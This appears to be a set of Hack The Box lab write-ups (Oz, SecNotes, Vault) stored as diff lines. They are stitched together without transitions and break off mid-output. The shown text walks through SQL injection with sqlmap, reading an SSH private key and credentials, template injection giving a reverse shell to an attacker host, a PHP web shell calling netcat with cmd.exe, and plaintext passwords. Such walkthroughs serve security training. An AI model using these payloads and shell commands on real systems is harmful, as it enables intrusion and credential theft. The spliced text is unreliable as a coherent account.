| index.html | 2018-03-31 00:57 | 2.1K |
Please register a username!
-``` - -Dirbusting is a bit more difficult than usual because the page randomly throws random strings in the response when we enumerate an invalid URI. - -The returned message contains either the **register a username** messages or a random string. - - - - - - - -We can use wfuzz and exclude responses that include only 1 or 4 words: - -``` -root@darkisland:~/SecLists/Discovery/Web-Content# wfuzz -z file,raft-small-words-lowercase.txt --hw 1,4 10.10.10.96/FUZZ - -================================================================== -ID Response Lines Word Chars Payload -================================================================== - -000199: C=200 3 L 6 W 79 Ch "users" -... -``` - -So we found the `/users` URI, but we still get a 'Please register a username!' message but this time it's in bold letters so there is something different with that URI. - -After trying a few parameters and URIs, we find that an 500 error is triggered when using the `http://10.10.10.96/users/'` URI. - -This indicates a probable SQL injection. We can use sqlmap to explore this further: - -``` -root@darkisland:~# sqlmap -u http://10.10.10.96/users/ - ___ - __H__ - ___ ___[.]_____ ___ ___ {1.2.8#stable} -|_ -| . [(] | .'| . | -|___|_ ["]_|_|_|__,| _| - |_|V |_| http://sqlmap.org - -[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program - -[*] starting at 18:48:35 - -[18:48:36] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data' -do you want to try URI injections in the target URL itself? [Y/n/q] -[18:48:44] [INFO] testing connection to the target URL -[18:48:44] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS -[18:48:44] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS -do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N] -[18:48:45] [WARNING] dropping timeout to 10 seconds (i.e. '--timeout=10') -[18:48:45] [INFO] testing if the target URL content is stable -[18:48:45] [INFO] target URL content is stable -[18:48:45] [INFO] testing if URI parameter '#1*' is dynamic -[18:48:45] [INFO] confirming that URI parameter '#1*' is dynamic -[18:48:45] [INFO] URI parameter '#1*' is dynamic -[18:48:45] [INFO] heuristics detected web page charset 'ascii' -[18:48:45] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable -[18:48:45] [INFO] testing for SQL injection on URI parameter '#1*' -[18:48:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' -[18:48:45] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' -[18:48:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' -[18:48:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' -[18:48:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)' -[18:48:46] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' -[18:48:46] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' -[18:48:46] [INFO] testing 'MySQL inline queries' -[18:48:46] [INFO] testing 'PostgreSQL inline queries' -[18:48:46] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' -[18:48:46] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' -[18:48:46] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' -[18:48:46] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' -[18:48:46] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind' -[18:48:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' -[18:48:47] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)' -[18:48:47] [INFO] testing 'Oracle AND time-based blind' -[18:48:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' -[18:48:48] [INFO] target URL appears to be UNION injectable with 1 columns -[18:48:48] [WARNING] applying generic concatenation (CONCAT) -[18:48:48] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable -[18:48:48] [INFO] checking if the injection point on URI parameter '#1*' is a false positive -URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] -sqlmap identified the following injection point(s) with a total of 121 HTTP(s) requests: ---- -Parameter: #1* (URI) - Type: UNION query - Title: Generic UNION query (NULL) - 1 column - Payload: http://10.10.10.96:80/users/' UNION ALL SELECT CONCAT(CONCAT('qbbqq','LTyCYJgVMHDgRhBJZQVYCtpRBHCImKTICLRjERMm'),'qqbvq')-- RRnL ---- -[18:48:51] [INFO] testing MySQL -[18:48:51] [INFO] confirming MySQL -[18:48:51] [INFO] the back-end DBMS is MySQL -back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) -[18:48:51] [WARNING] HTTP error codes detected during run: -500 (Internal Server Error) - 52 times -[18:48:51] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.96' - -[*] shutting down at 18:48:51 -``` - -We found that the URI parameter is vulnerable so we can now enumerate the database content. - -Databases: -``` -root@darkisland:~# sqlmap -u http://10.10.10.96/users/ --dbs -[...] -available databases [4]: -[*] information_schema -[*] mysql -[*] ozdb -[*] performance_schema -``` - -MySQL credentials: -``` -root@darkisland:~# sqlmap -u http://10.10.10.96/users/ --passwords -[...] - 9] [INFO] retrieved: "root","*61A2BD98DAD2A09749B6FC77A9578609D32518DD" -[18:50:29] [INFO] retrieved: "dorthi","*43AE542A63D9C43FF9D40D0280CFDA58F6C747CA" -[18:50:29] [INFO] retrieved: "root","*61A2BD98DAD2A09749B6FC77A9578609D32518DD" - -``` - -Content of the ozdb database: -``` -root@darkisland:~# sqlmap -u http://10.10.10.96/users/ -D ozdb --dump -[...] -+----+-------------+----------------------------------------------------------------------------------------+ -| id | username | password | -+----+-------------+----------------------------------------------------------------------------------------+ -| 1 | dorthi | $pbkdf2-sha256$5000$aA3h3LvXOseYk3IupVQKgQ$ogPU/XoFb.nzdCGDulkW3AeDZPbK580zeTxJnG0EJ78 | -| 2 | tin.man | $pbkdf2-sha256$5000$GgNACCFkDOE8B4AwZgzBuA$IXewCMHWhf7ktju5Sw.W.ZWMyHYAJ5mpvWialENXofk | -| 3 | wizard.oz | $pbkdf2-sha256$5000$BCDkXKuVMgaAEMJ4z5mzdg$GNn4Ti/hUyMgoyI7GKGJWeqlZg28RIqSqspvKQq6LWY | -| 4 | coward.lyon | $pbkdf2-sha256$5000$bU2JsVYqpbT2PqcUQmjN.Q$hO7DfQLTL6Nq2MeKei39Jn0ddmqly3uBxO/tbBuw4DY | -| 5 | toto | $pbkdf2-sha256$5000$Zax17l1Lac25V6oVwnjPWQ$oTYQQVsuSz9kmFggpAWB0yrKsMdPjvfob9NfBq4Wtkg | -| 6 | admin | $pbkdf2-sha256$5000$d47xHsP4P6eUUgoh5BzjfA$jWgyYmxDK.slJYUTsv9V9xZ3WWwcl9EBOsz.bARwGBQ | -+----+-------------+----------------------------------------------------------------------------------------+ -[...] -Database: ozdb -Table: tickets_gbw -[12 entries] -+----+----------+--------------------------------------------------------------------------------------------------------------------------------+ -| id | name | desc | -+----+----------+--------------------------------------------------------------------------------------------------------------------------------+ -| 1 | GBR-987 | Reissued new id_rsa and id_rsa.pub keys for ssh access to dorthi. | -| 2 | GBR-1204 | Where did all these damn monkey's come from!? I need to call pest control. | -| 3 | GBR-1205 | Note to self: Toto keeps chewing on the curtain, find one with dog repellent. | -| 4 | GBR-1389 | Nothing to see here... V2hhdCBkaWQgeW91IGV4cGVjdD8= | -| 5 | GBR-4034 | Think of a better secret knock for the front door. Doesn't seem that secure, a Lion got in today. | -| 6 | GBR-5012 | I bet you won't read the next entry. | -| 7 | GBR-7890 | HAHA! Made you look. | -| 8 | GBR-7945 | Dorthi should be able to find her keys in the default folder under /home/dorthi/ on the db. | -| 9 | GBR-8011 | Seriously though, WW91J3JlIGp1c3QgdHJ5aW5nIHRvbyBoYXJkLi4uIG5vYm9keSBoaWRlcyBhbnl0aGluZyBpbiBiYXNlNjQgYW55bW9yZS4uLiBjJ21vbi4= | -| 10 | GBR-8042 | You are just wasting time now... someone else is getting user.txt | -| 11 | GBR-8457 | Look... now they've got root.txt and you don't even have user.txt | -| 12 | GBR-9872 | db information loaded to ticket application for shared db access | -+----+----------+--------------------------------------------------------------------------------------------------------------------------------+ -``` - -Let's recap what we found: - - MySQL hashes - - OZDB users hashes - - Hint about port knocking enabled on the server - - Possible SSH keys available - -Using the `--file-read` option, we quickly find that there is no user.txt we can read and that the MySQL runs in a container. - -The `/etc/hosts` file gives it away, notice the randomly generated hostname which corresponds to the container ID. - -``` -root@darkisland:~# sqlmap -u http://10.10.10.96/users/ --file-read=/etc/hosts - ___ - __H__ - ___ ___[)]_____ ___ ___ {1.2.8#stable} -|_ -| . [.] | .'| . | -|___|_ ["]_|_|_|__,| _| - |_|V |_| http://sqlmap.org - -[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program - -[*] starting at 18:53:35 - -[18:53:35] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data' -do you want to try URI injections in the target URL itself? [Y/n/q] -[18:53:36] [INFO] resuming back-end DBMS 'mysql' -[18:53:36] [INFO] testing connection to the target URL -[18:53:36] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS -sqlmap resumed the following injection point(s) from stored session: ---- -Parameter: #1* (URI) - Type: UNION query - Title: Generic UNION query (NULL) - 1 column - Payload: http://10.10.10.96:80/users/' UNION ALL SELECT CONCAT(CONCAT('qbbqq','LTyCYJgVMHDgRhBJZQVYCtpRBHCImKTICLRjERMm'),'qqbvq')-- RRnL ---- -[18:53:36] [INFO] the back-end DBMS is MySQL -back-end DBMS: MySQL 5 (MariaDB fork) -[18:53:36] [INFO] fingerprinting the back-end DBMS operating system -[18:53:36] [INFO] the back-end DBMS operating system is Linux -[18:53:36] [INFO] fetching file: '/etc/hosts' -do you want confirmation that the remote file '/etc/hosts' has been successfully downloaded from the back-end DBMS file system? [Y/n] -[18:53:36] [INFO] the local file '/root/.sqlmap/output/10.10.10.96/files/_etc_hosts' and the remote file '/etc/hosts' have the same size (175 B) -files saved to [1]: -[*] /root/.sqlmap/output/10.10.10.96/files/_etc_hosts (same file) - -[18:53:36] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.96' - -[*] shutting down at 18:53:36 - -root@darkisland:~# cat /root/.sqlmap/output/10.10.10.96/files/_etc_hosts -127.0.0.1 localhost -::1 localhost ip6-localhost ip6-loopback -fe00::0 ip6-localnet -ff00::0 ip6-mcastprefix -ff02::1 ip6-allnodes -ff02::2 ip6-allrouters -10.100.10.4 b9b370edd41a -``` - -That's a dead end, next let's grab the SSH keys: - -``` -root@darkisland:~/oz#sqlmap -u http://10.10.10.96/users/ --file-read=/home/dorthi/.ssh/id_rsa - ___ - __H__ - ___ ___[.]_____ ___ ___ {1.2.8#stable} -|_ -| . [(] | .'| . | -|___|_ [']_|_|_|__,| _| - |_|V |_| http://sqlmap.org - -[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program - -[*] starting at 18:57:23 - -[18:57:23] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data' -do you want to try URI injections in the target URL itself? [Y/n/q] -[18:57:24] [INFO] resuming back-end DBMS 'mysql' -[18:57:24] [INFO] testing connection to the target URL -[18:57:24] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS -sqlmap resumed the following injection point(s) from stored session: ---- -Parameter: #1* (URI) - Type: UNION query - Title: Generic UNION query (NULL) - 1 column - Payload: http://10.10.10.96:80/users/' UNION ALL SELECT CONCAT(CONCAT('qbbqq','LTyCYJgVMHDgRhBJZQVYCtpRBHCImKTICLRjERMm'),'qqbvq')-- RRnL ---- -[18:57:24] [INFO] the back-end DBMS is MySQL -back-end DBMS: MySQL 5 (MariaDB fork) -[18:57:24] [INFO] fingerprinting the back-end DBMS operating system -[18:57:24] [INFO] the back-end DBMS operating system is Linux -[18:57:24] [INFO] fetching file: '/home/dorthi/.ssh/id_rsa' -do you want confirmation that the remote file '/home/dorthi/.ssh/id_rsa' has been successfully downloaded from the back-end DBMS file system? [Y/n] -[18:57:24] [INFO] the local file '/root/.sqlmap/output/10.10.10.96/files/_home_dorthi_.ssh_id_rsa' and the remote file '/home/dorthi/.ssh/id_rsa' have the same size (1766 B) -files saved to [1]: -[*] /root/.sqlmap/output/10.10.10.96/files/_home_dorthi_.ssh_id_rsa (same file) - -[18:57:24] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.96' - -[*] shutting down at 18:57:24 - -root@darkisland:~/oz# cat /root/.sqlmap/output/10.10.10.96/files/_home_dorthi_.ssh_id_rsa ------BEGIN RSA PRIVATE KEY----- -Proc-Type: 4,ENCRYPTED -DEK-Info: AES-128-CBC,66B9F39F33BA0788CD27207BF8F2D0F6 - -RV903H6V6lhKxl8dhocaEtL4Uzkyj1fqyVj3eySqkAFkkXms2H+4lfb35UZb3WFC -b6P7zYZDAnRLQjJEc/sQVXuwEzfWMa7pYF9Kv6ijIZmSDOMAPjaCjnjnX5kJMK3F -e1BrQdh0phWAhhUmbYvt2z8DD/OGKhxlC7oT/49I/ME+tm5eyLGbK69Ouxb5PBty -h9A+Tn70giENR/ExO8qY4WNQQMtiCM0tszes8+guOEKCckMivmR2qWHTCs+N7wbz -a//JhOG+GdqvEhJp15pQuj/3SC9O5xyLe2mqL1TUK3WrFpQyv8lXartH1vKTnybd -9+Wme/gVTfwSZWgMeGQjRXWe3KUsgGZNFK75wYtA/F/DB7QZFwfO2Lb0mL7Xyzx6 -ZakulY4bFpBtXsuBJYPNy7wB5ZveRSB2f8dznu2mvarByMoCN/XgVVZujugNbEcj -evroLGNe/+ISkJWV443KyTcJ2iIRAa+BzHhrBx31kG//nix0vXoHzB8Vj3fqh+2M -EycVvDxLK8CIMzHc3cRVUMBeQ2X4GuLPGRKlUeSrmYz/sH75AR3zh6Zvlva15Yav -5vR48cdShFS3FC6aH6SQWVe9K3oHzYhwlfT+wVPfaeZrSlCH0hG1z9C1B9BxMLQr -DHejp9bbLppJ39pe1U+DBjzDo4s6rk+Ci/5dpieoeXrmGTqElDQi+KEU9g8CJpto -bYAGUxPFIpPrN2+1RBbxY6YVaop5eyqtnF4ZGpJCoCW2r8BRsCvuILvrO1O0gXF+ -wtsktmylmHvHApoXrW/GThjdVkdD9U/6Rmvv3s/OhtlAp3Wqw6RI+KfCPGiCzh1V -0yfXH70CfLO2NcWtO/JUJvYH3M+rvDDHZSLqgW841ykzdrQXnR7s9Nj2EmoW72IH -znNPmB1LQtD45NH6OIG8+QWNAdQHcgZepwPz4/9pe2tEqu7Mg/cLUBsTYb4a6mft -icOX9OAOrcZ8RGcIdVWtzU4q2YKZex4lyzeC/k4TAbofZ0E4kUsaIbFV/7OMedMC -zCTJ6rlAl2d8e8dsSfF96QWevnD50yx+wbJ/izZonHmU/2ac4c8LPYq6Q9KLmlnu -vI9bLfOJh8DLFuqCVI8GzROjIdxdlzk9yp4LxcAnm1Ox9MEIqmOVwAd3bEmYckKw -w/EmArNIrnr54Q7a1PMdCsZcejCjnvmQFZ3ko5CoFCC+kUe1j92i081kOAhmXqV3 -c6xgh8Vg2qOyzoZm5wRZZF2nTXnnCQ3OYR3NMsUBTVG2tlgfp1NgdwIyxTWn09V0 -nOzqNtJ7OBt0/RewTsFgoNVrCQbQ8VvZFckvG8sV3U9bh9Zl28/2I3B472iQRo+5 -uoRHpAgfOSOERtxuMpkrkU3IzSPsVS9c3LgKhiTS5wTbTw7O/vxxNOoLpoxO2Wzb -/4XnEBh6VgLrjThQcGKigkWJaKyBHOhEtuZqDv2MFSE6zdX/N+L/FRIv1oVR9VYv -QGpqEaGSUG+/TSdcANQdD3mv6EGYI+o4rZKEHJKUlCI+I48jHbvQCLWaR/bkjZJu -XtSuV0TJXto6abznSC1BFlACIqBmHdeaIXWqH+NlXOCGE8jQGM8s/fd/j5g1Adw3 ------END RSA PRIVATE KEY----- -``` - -That private key is encrypted, we'll need to extract the hash and convert it to a john format: - -``` -root@darkisland:~/oz# ssh2john hash.txt > hash -root@darkisland:~/oz# cat hash -hash.txt:$ssh2$2d2d2d2d2d424547494e205253412050524956415445204b45592d2d2d2d2d0a50726f632d547970653a20342c454e435259505445440a44454b2d496e666f3a204145532d3132382d4342432c36364239463339463333424130373838434432373230374246384632443046360a0a5256393033483656366c684b786c3864686f636145744c34557a6b796a31667179566a33657953716b41466b6b586d7332482b346c66623335555a62335746430a623650377a595a44416e524c516a4a45632f735156587577457a66574d6137705946394b7636696a495a6d53444f4d41506a61436a6e6a6e58356b4a4d4b33460a6531427251646830706857416868556d62597674327a3844442f4f474b68786c43376f542f3439492f4d452b746d3565794c47624b36394f75786235504274790a6839412b546e37306769454e522f45784f38715934574e51514d7469434d3074737a6573382b67754f454b43636b4d69766d52327157485443732b4e3777627a0a612f2f4a684f472b4764717645684a7031357051756a2f335343394f3578794c65326d714c3154554b3357724670517976386c586172744831764b546e7962640a392b576d652f6756546677535a57674d6547516a52585765334b557367475a4e464b3735775974412f462f444237515a4677664f324c62306d4c3758797a78360a5a616b756c59346246704274587375424a59504e79377742355a7665525342326638647a6e75326d76617242794d6f434e2f586756565a756a75674e6245636a0a6576726f4c474e652f2b49536b4a57563434334b7954634a3269495241612b427a486872427833316b472f2f6e69783076586f487a4238566a336671682b324d0a457963567644784c4b3843494d7a486333635256554d42655132583447754c5047524b6c556553726d597a2f734837354152337a68365a766c766131355961760a3576523438636453684653334643366148365351575665394b336f487a5968776c66542b7756506661655a72536c4348306847317a394331423942784d4c51720a4448656a703962624c70704a3339706531552b44426a7a446f347336726b2b43692f35647069656f6558726d475471456c4451692b4b4555396738434a70746f0a6259414755785046497050724e322b315242627859365956616f7035657971746e46345a47704a436f4357327238425273437675494c76724f314f306758462b0a7774736b746d796c6d48764841706f5872572f4754686a64566b644439552f36526d767633732f4f68746c4170335771773652492b4b6643504769437a6831560a3079665848373043664c4f324e6357744f2f4a554a765948334d2b72764444485a534c716757383431796b7a647251586e523773394e6a32456d6f57373249480a7a6e4e506d42314c51744434354e48364f4947382b51574e4164514863675a657077507a342f3970653274457175374d672f634c5542735459623461366d66740a69634f58394f414f72635a3852476349645657747a55347132594b5a6578346c797a65432f6b345441626f665a3045346b557361496246562f374f4d65644d430a7a43544a36726c416c326438653864735366463936515765766e44353079782b77624a2f697a5a6f6e486d552f3261633463384c5059713651394b4c6d6c6e750a764939624c664f4a6838444c46757143564938477a524f6a496478646c7a6b397970344c7863416e6d314f78394d4549716d4f567741643362456d59636b4b770a772f456d41724e49726e72353451376131504d6443735a63656a436a6e766d51465a336b6f35436f4643432b6b5565316a3932693038316b4f41686d587156330a633678676838566732714f797a6f5a6d3577525a5a46326e54586e6e4351334f5952334e4d73554254564732746c676670314e67647749797854576e303956300a6e4f7a714e744a374f4274302f526577547346676f4e5672435162513856765a46636b76473873563355396268395a6c32382f324933423437326951526f2b350a756f5248704167664f534f45527478754d706b726b5533497a53507356533963334c674b68695453357754625477374f2f7678784e4f6f4c706f784f32577a620a2f34586e4542683656674c726a54685163474b69676b574a614b7942484f684574755a714476324d465345367a64582f4e2b4c2f46524976316f5652395659760a514770714561475355472b2f54536463414e516444336d7636454759492b6f34725a4b45484a4b556c43492b4934386a48627651434c5761522f626b6a5a4a750a587453755630544a58746f3661627a6e53433142466c41434971426d4864656149585771482b4e6c584f434745386a51474d38732f66642f6a356731416477330a2d2d2d2d2d454e44205253412050524956415445204b45592d2d2d2d2d0a*1766*0 -``` - -### Cracking hashes - -The only hash we are able to crack amongst all the stuff we recovered from MySQL and the SSH key is the `wizard.oz` account from the ozdb database: - -``` -root@darkisland:~/oz# john -w=/usr/share/wordlists/rockyou.txt users.txt --fork=4 -Using default input encoding: UTF-8 -Loaded 6 password hashes with 6 different salts (PBKDF2-HMAC-SHA256 [PBKDF2-SHA256 128/128 AVX 4x]) -Node numbers 1-4 of 4 (fork) -Press 'q' or Ctrl-C to abort, almost any other key for status -3 0g 0:00:44:19 2.46% (ETA: 2018-09-04 01:09) 0g/s 38.70p/s 232.2c/s 232.2C/s johansen1..joeyy -2 0g 0:00:44:19 2.47% (ETA: 2018-09-04 01:08) 0g/s 38.72p/s 232.3c/s 232.3C/s jinsu..jing21 -4 0g 0:00:44:19 2.46% (ETA: 2018-09-04 01:10) 0g/s 38.69p/s 232.1c/s 232.1C/s johnpaul12..johnny43 -1 0g 0:00:44:19 2.47% (ETA: 2018-09-04 01:08) 0g/s 38.72p/s 232.3c/s 232.3C/s jmedina..jlucky -``` - -Password found: `wizard.oz` / `wizardofoz22` - -### Ticketing application - -Once logged in with the `wizard.oz` account we can see the existing tickets and create new ones. - - - -Unfortunately the creation of new tickets doesn't seem to work; when we submit a new ticket is just brings us back to the tickets list. - - - - - -If we use Burp to look at the POST response, we see that the name and description is echoed back to us. If we send a payload with curly braces, we trigger a different response where the math operation inside is executed so we know we are looking at a Service Side Template Injection (SSTI) vulnerability. - - - -To exploit the SSTI vulnerability we will use the [tplmap](https://github.com/epinna/tplmap) utility. - -``` -root@darkisland:~/tplmap# python tplmap.py -c "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IndpemFyZC5veiIsImV4cCI6MTUzNTkzMTQ2MX0.3x2jmednxdT4PkLgaqV_wDRqy7AjowugPnpbJsMLCnc" -u http://10.10.10.96:8080 -e Jinja2 -d "name=param1&desc=param2" -[+] Tplmap 0.5 - Automatic Server-Side Template Injection Detection and Exploitation Tool - -[+] Testing if POST parameter 'name' is injectable -[+] Jinja2 plugin is testing rendering with tag '{{*}}' -[+] Jinja2 plugin is testing blind injection -[+] Jinja2 plugin has confirmed blind injection -[+] Tplmap identified the following injection point: - - POST parameter: name - Engine: Jinja2 - Injection: * - Context: text - OS: undetected - Technique: blind - Capabilities: - - Shell command execution: ok (blind) - Bind and reverse shell: ok - File write: ok (blind) - File read: no - Code evaluation: ok, python code (blind) - -[+] Rerun tplmap providing one of the following options: - - --os-shell Run shell on the target - --os-cmd Execute shell commands - --bind-shell PORT Connect to a shell bind to a target port - --reverse-shell HOST PORT Send a shell back to the attacker's port - --upload LOCAL REMOTE Upload files to the server -``` - -Let's get a shell with the `--reverse-shell` parameter: - -``` -root@darkisland:~/tplmap# python tplmap.py -c "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IndpemFyZC5veiIsImV4cCI6MTUzNTkzMTQ2MX0.3x2jmednxdT4PkLgaqV_wDRqy7AjowugPnpbJsMLCnc" -u http://10.10.10.96:8080 -e Jinja2 -d "name=param1&desc=param2" --reverse-shell 10.10.14.23 4444 -[+] Tplmap 0.5 - Automatic Server-Side Template Injection Detection and Exploitation Tool - -[+] Testing if POST parameter 'name' is injectable -[+] Jinja2 plugin is testing rendering with tag '{{*}}' -[+] Jinja2 plugin is testing blind injection -[+] Jinja2 plugin has confirmed blind injection -[+] Tplmap identified the following injection point: - - POST parameter: name - Engine: Jinja2 - Injection: * - Context: text - OS: undetected - Technique: blind - Capabilities: - - Shell command execution: ok (blind) - Bind and reverse shell: ok - File write: ok (blind) - File read: no - Code evaluation: ok, python code (blind) -[...] - -root@darkisland:~# nc -lvnp 4444 -listening on [any] 4444 ... -connect to [10.10.14.23] from (UNKNOWN) [10.10.10.96] 35807 -/bin/sh: can't access tty; job control turned off -/app # -``` - -### Inside the ticket app container - -The port knocking sequence can be found in the `/.secret` directory: - -``` -/app # ls -la /.secret -total 12 -drwxr-xr-x 2 root root 4096 Apr 24 18:27 . -drwxr-xr-x 53 root root 4096 May 15 17:24 .. --rw-r--r-- 1 root root 262 Apr 24 18:27 knockd.conf -/app # cat /.secret/knockd.conf -[options] - logfile = /var/log/knockd.log - -[opencloseSSH] - - sequence = 40809:udp,50212:udp,46969:udp - seq_timeout = 15 - start_command = ufw allow from %IP% to any port 22 - cmd_timeout = 10 - stop_command = ufw delete allow from %IP% to any port 22 - tcpflags = syn -``` - -The MySQL credentials are also found in `/containers/database/start.sh` - -``` -/containers/database # cat start.sh -#!/bin/bash - -docker run -d -v /connect/mysql:/var/lib/mysql --name ozdb \ ---net prodnet --ip 10.100.10.4 \ --e MYSQL_ROOT_PASSWORD=SuP3rS3cr3tP@ss \ --e MYSQL_USER=dorthi \ --e MYSQL_PASSWORD=N0Pl4c3L1keH0me \ --e MYSQL_DATABASE=ozdb \ --v /connect/sshkeys:/home/dorthi/.ssh/:ro \ --v /dev/null:/root/.bash_history:ro \ --v /dev/null:/root/.ash_history:ro \ --v /dev/null:/root/.sh_history:ro \ ---restart=always \ -mariadb:5.5 -``` - -### Access to the host OS - -First, we open port 22 using the port-knock sequence: -``` -../knock/knock -u 10.10.10.96 40809 50212 46969 -``` - -The we can log in as `dorthi` with the MySQL password `N0Pl4c3L1keH0me`: -``` -root@darkisland:~/oz# ssh -i id_rsa dorthi@10.10.10.96 -Enter passphrase for key 'id_rsa': -dorthi@Oz:~$ cat user.txt -c21cf- -- -``` - -``` -root@darkisland:~/tmp# smbclient -U tyler //10.10.10.97/new-site -WARNING: The "syslog" option is deprecated -Enter WORKGROUP\tyler's password: -Try "help" to get a list of possible commands. -smb: \> pwd -Current directory is \\10.10.10.97\new-site\ -smb: \> ls - . D 0 Sun Aug 19 14:06:14 2018 - .. D 0 Sun Aug 19 14:06:14 2018 - iisstart.htm A 696 Thu Jun 21 11:26:03 2018 - iisstart.png A 98757 Thu Jun 21 11:26:03 2018 - - 12978687 blocks of size 4096. 7919013 blocks available -smb: \> put snowscan.php -putting file snowscan.php as \snowscan.php (1.6 kb/s) (average 1.6 kb/s) -smb: \> put nc.exe -putting file nc.exe as \nc.exe (152.5 kb/s) (average 91.8 kb/s) -``` - -Trigger the netcat connection with: `http://secnotes.htb:8808/snowscan.php?cmd=nc+-e+cmd.exe+10.10.14.23+4444` -``` -root@darkisland:~/tmp# nc -lvnp 4444 -listening on [any] 4444 ... -connect to [10.10.14.23] from (UNKNOWN) [10.10.10.97] 49757 -Microsoft Windows [Version 10.0.17134.228] -(c) 2018 Microsoft Corporation. All rights reserved. - -C:\inetpub\new-site>whoami -whoami -secnotes\tyler - -C:\inetpub\new-site>type c:\users\tyler\desktop\user.txt -type c:\users\tyler\desktop\user.txt -6fa755
- --``` - -When we try to upload a simple PHP command shell we get a `sorry that file type is not allowed` error message. - -After trying a few different file types, I noticed we can use the `.php5` file extension and we get a `The file was uploaded successfully` message. - -We now have RCE: - - - -Found a couple of interesting files in Dave's desktop folder: - -**http://vault.htb/sparklays/design/uploads/shell.php5?cmd=ls%20-l%20/home/dave/Desktop** -``` -total 12 --rw-rw-r-- 1 alex alex 74 Jul 17 10:30 Servers --rw-rw-r-- 1 alex alex 14 Jul 17 10:31 key --rw-rw-r-- 1 alex alex 20 Jul 17 10:31 ssh -``` - -The `ssh` file contains plaintext credentials: - -**http://vault.htb/sparklays/design/uploads/shell.php5?cmd=cat%20/home/dave/Desktop/ssh** -``` -dave -Dav3therav3123 -``` - -### Shell access - -Using the SSH credentials we found in Dave's directory we can now log in: - -``` -root@ragingunicorn:~/hackthebox/Machines/Vault# ssh dave@10.10.10.109 -dave@10.10.10.109's password: - -Last login: Sat Nov 3 19:59:05 2018 from 10.10.15.233 -dave@ubuntu:~$ -``` - -The `~/Desktop` directory contains a couple of interesting files: - -``` -dave@ubuntu:~/Desktop$ ls -l -total 12 --rw-rw-r-- 1 alex alex 14 Jul 17 10:31 key --rw-rw-r-- 1 alex alex 74 Jul 17 10:30 Servers --rw-rw-r-- 1 alex alex 20 Jul 17 10:31 ssh - -dave@ubuntu:~/Desktop$ cat key -itscominghome - -dave@ubuntu:~/Desktop$ cat Servers -DNS + Configurator - 192.168.122.4 -Firewall - 192.168.122.5 -The Vault - x - -dave@ubuntu:~/Desktop$ cat ssh -dave -Dav3therav3123 -``` - -The user also has a gpg keyring: - -``` -dave@ubuntu:~/.gnupg$ ls -l -total 28 -drwx------ 2 dave dave 4096 Jul 17 2018 private-keys-v1.d --rw------- 1 dave dave 2205 Jul 24 2018 pubring.gpg --rw------- 1 dave dave 2205 Jul 24 2018 pubring.gpg~ --rw------- 1 dave dave 600 Sep 3 2018 random_seed --rw------- 1 dave dave 4879 Jul 24 2018 secring.gpg --rw------- 1 dave dave 1280 Jul 24 2018 trustdb.gpg -``` - -Based on the `Servers` file it seems there are other VMs or containers running. We can confirm this also by checking the network interfaces (there's a virtual bridge interface with the same subnet mentionned in the `Server` file: - -``` -dave@ubuntu:~/Desktop$ ifconfig -ens33 Link encap:Ethernet HWaddr 00:50:56:b2:8d:92 - inet addr:10.10.10.109 Bcast:10.10.10.255 Mask:255.255.255.0 - inet6 addr: fe80::250:56ff:feb2:8d92/64 Scope:Link - inet6 addr: dead:beef::250:56ff:feb2:8d92/64 Scope:Global - UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 - RX packets:484701 errors:0 dropped:0 overruns:0 frame:0 - TX packets:372962 errors:0 dropped:0 overruns:0 carrier:0 - collisions:0 txqueuelen:1000 - RX bytes:61423226 (61.4 MB) TX bytes:123066398 (123.0 MB) - -virbr0 Link encap:Ethernet HWaddr fe:54:00:17:ab:49 - inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0 - UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 - RX packets:34 errors:0 dropped:0 overruns:0 frame:0 - TX packets:8 